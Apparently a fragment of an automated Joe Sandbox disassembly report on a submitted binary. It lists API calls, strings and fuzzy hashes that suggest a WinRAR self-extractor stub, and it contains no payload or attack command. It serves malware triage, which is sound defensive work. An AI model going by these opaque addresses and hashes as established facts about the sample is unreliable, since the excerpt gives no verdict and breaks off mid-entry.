WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00359806
CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0035982D

Strings

<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 00359760
utf-8"></head>, xrefs: 0035976B
</html>, xrefs: 003597B7
<html>, xrefs: 00359755, 0035978E
Fjun5, xrefs: 0035982D

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
String ID: Fjun5$</html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 1777411235-2605544992
Opcode ID: 5407b6b5d8c5cb8608665da2f753f9cc0172c9ebbdff3a27c1c809b338db05e5
Instruction ID: cfb4bd10180f0b9d7694e8f7ab05a68fbf4bcfe6fd8bca3479f073b66bcd6a9f
Opcode Fuzzy Hash: 5407b6b5d8c5cb8608665da2f753f9cc0172c9ebbdff3a27c1c809b338db05e5
Instruction Fuzzy Hash: DA311832108311BAE727AB34DC46FAB779CDF42321F15451FF9059A1E2EB649A0D83B6

Function 0035D69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000005), ref: 0035D6C1
GetClassNameW.USER32(00000000,?,00000800), ref: 0035D6ED

Part of subcall function 00351FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0034C116,00000000,.exe,?,?,00000800,?,?,?,00358E3C), ref: 00351FD1

GetWindowLongW.USER32(00000000,000000F0), ref: 0035D709
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0035D720
GetObjectW.GDI32(00000000,00000018,?), ref: 0035D734
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0035D75D
DeleteObject.GDI32(00000000), ref: 0035D764
GetWindow.USER32(00000000,00000002), ref: 0035D76D

Strings

STATIC, xrefs: 0035D6F3

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
String ID: STATIC
API String ID: 3820355801-1882779555
Opcode ID: 5465a0935ab7ac52a6e5e6dd98a1064ee7cd0b35d711726a4c802a7ec3e0c9f4
Instruction ID: 869caa2f44cee443f6339b7418e87df8cb7d380248bce1652e942af84f18de4f
Opcode Fuzzy Hash: 5465a0935ab7ac52a6e5e6dd98a1064ee7cd0b35d711726a4c802a7ec3e0c9f4
Instruction Fuzzy Hash: 651106721407107BE233BF709C4AFAF765CAF49712F028611FE52A60B1DB64CB0D96A6

Function 00362E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00362F50
___TypeMatch.LIBVCRUNTIME ref: 0036305E
_UnwindNestedFrames.LIBCMT ref: 003631B0
CallUnexpected.LIBVCRUNTIME ref: 003631CB
_abort.LIBCMT ref: 003631D0

Strings

csm, xrefs: 00362EDB
csm, xrefs: 00362F87
csm, xrefs: 00362E6E

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
String ID: csm$csm$csm
API String ID: 322700389-393685449
Opcode ID: 0a5357c29f71ca95eb29a941b4f30ceb4dd09f2cbe5857f05479cbd12e8cd0b6
Instruction ID: 2eb1368bc68b32b1527abfd69d577a6c4e6e658ce30068d0106521765d17c648
Opcode Fuzzy Hash: 0a5357c29f71ca95eb29a941b4f30ceb4dd09f2cbe5857f05479cbd12e8cd0b6
Instruction Fuzzy Hash: F9B18871800609EFCF2AEFA4C8819AFBBB5FF05310F16815AE8116F25AD771DA51CB91

Function 0034AF24 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 210COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0034AF29

Strings

WQL, xrefs: 0034AFDC
n5, xrefs: 0034AFC0
ROOT\CIMV2, xrefs: 0034AF5C
Name, xrefs: 0034B0B0
Windows 10, xrefs: 0034B0C2
SELECT * FROM Win32_OperatingSystem, xrefs: 0034AFCA

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: H_prolog
String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10$n5
API String ID: 3519838083-2768671185
Opcode ID: 493f167bf019c3571ab6a19bd21b5905baad481d8da68a4772e49c8523332fb5
Instruction ID: 12b01de356f7adbf69f1ee2bd72261a85d78b5d7b188043b4c051c62e5f493a6
Opcode Fuzzy Hash: 493f167bf019c3571ab6a19bd21b5905baad481d8da68a4772e49c8523332fb5
Instruction Fuzzy Hash: 05719B70A00619EFDB26DFA4CC959AFB7B8FF48310B04055DF516AB2A0CB30AE41DB60

Function 00346FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00346FAA
_wcslen.LIBCMT ref: 00347013
_wcslen.LIBCMT ref: 00347084

Part of subcall function 00347A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00347AAB
Part of subcall function 00347A9C: GetLastError.KERNEL32 ref: 00347AF1
Part of subcall function 00347A9C: CloseHandle.KERNEL32(?), ref: 00347B00

Strings

SeCreateSymbolicLinkPrivilege, xrefs: 00346FCC
UNC\, xrefs: 00347051
\??\, xrefs: 0034702B
SeRestorePrivilege, xrefs: 00346FC2

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3122303884-3508440684
Opcode ID: b7c26fcf1616f46d55e0504c872dc4d363ae5873f49510470cd38bd2ee9bd437
Instruction ID: 6d55d3a3de033bdfc5bc8d4bc9c6a0c17aa0aedc6c4e003af51d73a79aceb3b3
Opcode Fuzzy Hash: b7c26fcf1616f46d55e0504c872dc4d363ae5873f49510470cd38bd2ee9bd437
Instruction Fuzzy Hash: DC41A6B1D087847AEB33AB749C82FEEB7EC9F04344F004455F955AE182D775BA888761

Function 0035B5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00341316: GetDlgItem.USER32(00000000,00003021), ref: 0034135A
Part of subcall function 00341316: SetWindowTextW.USER32(00000000,003735F4), ref: 00341370

EndDialog.USER32(?,00000001), ref: 0035B610
SendMessageW.USER32(?,00000080,00000001,?), ref: 0035B637
SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0035B650
SetWindowTextW.USER32(?,?), ref: 0035B661
GetDlgItem.USER32(?,00000065), ref: 0035B66A
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0035B67E
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0035B694

Strings

LICENSEDLG, xrefs: 0035B5D4

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: MessageSend$Item$TextWindow$Dialog
String ID: LICENSEDLG
API String ID: 3214253823-2177901306
Opcode ID: c846f549054a3f223e5225e0c8030b605e177bfd83129db4175c544400a5493b
Instruction ID: 2de0c29ec3f166d072cc49a0766bc3b9a13f9fe87388df4980bff0789935c402
Opcode Fuzzy Hash: c846f549054a3f223e5225e0c8030b605e177bfd83129db4175c544400a5493b
Instruction Fuzzy Hash: 6A21B232244205BFD2139F76EC4AF7BBB6DEB46B82F024015FA01E65B0CB629D059B35

Function 0035FD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,D9BE7E2B,00000001,00000000,00000000,?,?,0034AF6C,ROOT\CIMV2), ref: 0035FD99
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,0034AF6C,ROOT\CIMV2), ref: 0035FE14
SysAllocString.OLEAUT32(00000000), ref: 0035FE1F
_com_issue_error.COMSUPP ref: 0035FE48
_com_issue_error.COMSUPP ref: 0035FE52
GetLastError.KERNEL32(80070057,D9BE7E2B,00000001,00000000,00000000,?,?,0034AF6C,ROOT\CIMV2), ref: 0035FE57
_com_issue_error.COMSUPP ref: 0035FE6A
GetLastError.KERNEL32(00000000,?,?,0034AF6C,ROOT\CIMV2), ref: 0035FE80
_com_issue_error.COMSUPP ref: 0035FE93

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
String ID:
API String ID: 1353541977-0
Opcode ID: 8ae324a17a8d68d0e0ae3a918c6c5a725adff9a31d19c45700d1c9d6ba603eaa
Instruction ID: 1db887dc4e9cef5dc9fdf5305ce7a85d213769bc9999b0e1ab7a54a6fc39d6d6
Opcode Fuzzy Hash: 8ae324a17a8d68d0e0ae3a918c6c5a725adff9a31d19c45700d1c9d6ba603eaa
Instruction Fuzzy Hash: 0941F971A00209AFD7129F64CC46FAFBBA8EB48711F108239FD09EB2A1D7359944C7E5

Function 00349382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00349387
GetLongPathNameW.KERNEL32(?,?,00000800), ref: 003493AA
GetShortPathNameW.KERNEL32(?,?,00000800), ref: 003493C9

Part of subcall function 0034C29A: _wcslen.LIBCMT ref: 0034C2A2

Part of subcall function 00351FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0034C116,00000000,.exe,?,?,00000800,?,?,?,00358E3C), ref: 00351FD1

_swprintf.LIBCMT ref: 00349465

Part of subcall function 00344092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003440A5

MoveFileW.KERNEL32(?,?), ref: 003494D4
MoveFileW.KERNEL32(?,?), ref: 00349514

Strings

rtmp%d, xrefs: 0034944E

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
String ID: rtmp%d
API String ID: 3726343395-3303766350
Opcode ID: 99c6ea23883182b3d33f55d086b0f57362006898c4fdb955f9ded959179b4c48
Instruction ID: 6ca2f98cae7dd9de9b7feff72da0d9680fb303d2c61890f192a493c1ec9ad9bc
Opcode Fuzzy Hash: 99c6ea23883182b3d33f55d086b0f57362006898c4fdb955f9ded959179b4c48
Instruction Fuzzy Hash: 63415271901254A6CF23EBA1CC45FDF73BCAF45340F1048E6B649EB151DB78AB899B60

Function 00341100 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 119COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0034112B
_wcslen.LIBCMT ref: 00341153
_wcslen.LIBCMT ref: 00341182
_wcslen.LIBCMT ref: 003411A9

Strings

z5, xrefs: 00341219
p5, xrefs: 00341205, 00341233
U5, xrefs: 0034120D, 0034123B

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: _wcslen
String ID: U5$p5$z5
API String ID: 176396367-2763067563
Opcode ID: 4b121ba34ffc850249807b893cad2c3fc43083665139e09f6943f8e1ab9cdfbf
Instruction ID: 5ce16f7a46f4d30e34d5c83452544d404bff6e4b89250930d4281ae73aebe73e
Opcode Fuzzy Hash: 4b121ba34ffc850249807b893cad2c3fc43083665139e09f6943f8e1ab9cdfbf
Instruction Fuzzy Hash: 0E41B4719006699BCB269F688D069DFBBBCEF01311F014019FD46FB255DB70BE498BA4

Function 00359ED5 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 114COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000000), ref: 00359EEE
GetWindowRect.USER32(?,00000000), ref: 00359F44
ShowWindow.USER32(?,00000005,00000000), ref: 00359FDB
SetWindowTextW.USER32(?,00000000), ref: 00359FE3
ShowWindow.USER32(00000000,00000005), ref: 00359FF9

Strings

5, xrefs: 00359F52, 00359F87
RarHtmlClassName, xrefs: 00359FA5

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: Window$Show$RectText
String ID: 5$RarHtmlClassName
API String ID: 3937224194-331783991
Opcode ID: 20031e87bb5ea2140673725fb5de7222df5a925f6a58d78dd8426d1b830ca55c
Instruction ID: 956cda823cd9d14ac49aaf67485be40d8c5678e3e9d5009763a0cb75c2af57c1
Opcode Fuzzy Hash: 20031e87bb5ea2140673725fb5de7222df5a925f6a58d78dd8426d1b830ca55c
Instruction Fuzzy Hash: 12418D32108210EFCB226F64DC48F6BBBA8FF49712F018559FC499A166CB34D909DB65

Function 00351218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 0035122E

Part of subcall function 0034B146: GetVersionExW.KERNEL32(?), ref: 0034B16B

FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00351251
FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00351263
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00351274
SystemTimeToFileTime.KERNEL32(?,?), ref: 00351284
SystemTimeToFileTime.KERNEL32(?,?), ref: 00351294
FileTimeToSystemTime.KERNEL32(?,?,?), ref: 003512CF
__aullrem.LIBCMT ref: 00351379

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
String ID:
API String ID: 1247370737-0
Opcode ID: 64bdef7e2505cf9d55531f7342b670dc887c0cce7bfc31df3afe45a880132d5c
Instruction ID: 3086f2c160ce6d359da775bb72579c233c4ed37396b8917cb66f2db183a047fb
Opcode Fuzzy Hash: 64bdef7e2505cf9d55531f7342b670dc887c0cce7bfc31df3afe45a880132d5c
Instruction Fuzzy Hash: 7A4148B5408305AFC711DF65C884A6BBBF9FF88315F40892EF99AC6210E734E649DB52

Function 00342210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00342536

Part of subcall function 00344092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003440A5

Part of subcall function 003505DA: _wcslen.LIBCMT ref: 003505E0

Strings

x%u, xrefs: 003426FD
xc%u, xrefs: 0034275A
;%u, xrefs: 00342523

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: __vswprintf_c_l_swprintf_wcslen
String ID: ;%u$x%u$xc%u
API String ID: 3053425827-2277559157
Opcode ID: 1f9e60bb4d46b9bbd5d96a23db749c8ea245201149f9cc669749ee2d0f9650ff
Instruction ID: 803961dc2c050af8d27c104a0210af5c04be440510e4b549e693ca7210a0bd89
Opcode Fuzzy Hash: 1f9e60bb4d46b9bbd5d96a23db749c8ea245201149f9cc669749ee2d0f9650ff
Instruction Fuzzy Hash: 4CF104706043409BCB27DF2484D5BAF77DA6F90300F48496DFD8AAF283DB64A949C766

Function 00359CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00359D0A

Strings

</p>, xrefs: 00359DE8
<br>, xrefs: 00359DFE
</style>, xrefs: 00359E52
>, xrefs: 00359D4B
<style>, xrefs: 00359E30

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: _wcslen
String ID: </p>$</style>$<br>$<style>$>
API String ID: 176396367-3568243669
Opcode ID: 09f2c0decca5b63927b701196d73708aa6ec975f11449e4e2ceca55f771384d4
Instruction ID: 80edcbd7683d745483edc8464fb96251775f566e46605e1c53809e21a7d3cbc1
Opcode Fuzzy Hash: 09f2c0decca5b63927b701196d73708aa6ec975f11449e4e2ceca55f771384d4
Instruction Fuzzy Hash: A9513666700362D5DB329A299C12F7673F4DFA1752F6A042BFDC18B1E0FB658C898361

Function 0036F68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0036FE02,00000000,00000000,00000000,00000000,00000000,?), ref: 0036F6CF
__fassign.LIBCMT ref: 0036F74A
__fassign.LIBCMT ref: 0036F765
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0036F78B
WriteFile.KERNEL32(?,00000000,00000000,0036FE02,00000000,?,?,?,?,?,?,?,?,?,0036FE02,00000000), ref: 0036F7AA
WriteFile.KERNEL32(?,00000000,00000001,0036FE02,00000000,?,?,?,?,?,?,?,?,?,0036FE02,00000000), ref: 0036F7E3

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 02fd61be7078979ac51741ba60f91658a38b81d20b49312e5114c37b999dd68f
Instruction ID: 6fd8505c2a8d94afd1a892da4dff3676d92229acbb87666a9f5e043b0ffc6683
Opcode Fuzzy Hash: 02fd61be7078979ac51741ba60f91658a38b81d20b49312e5114c37b999dd68f
Instruction Fuzzy Hash: 2151B4B1D002499FCB11CFA8EC85AEEBBF9EF09300F15816AE555E7255D730EA40CBA4

Function 0035CE87 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000800,?), ref: 0035CE9D

Part of subcall function 0034B690: _wcslen.LIBCMT ref: 0034B696

_swprintf.LIBCMT ref: 0035CED1

Part of subcall function 00344092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003440A5

SetDlgItemTextW.USER32(?,00000066,0038946A), ref: 0035CEF1
_wcschr.LIBVCRUNTIME ref: 0035CF22
EndDialog.USER32(?,00000001), ref: 0035CFFE

Strings

%s%s%u, xrefs: 0035CEC6

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

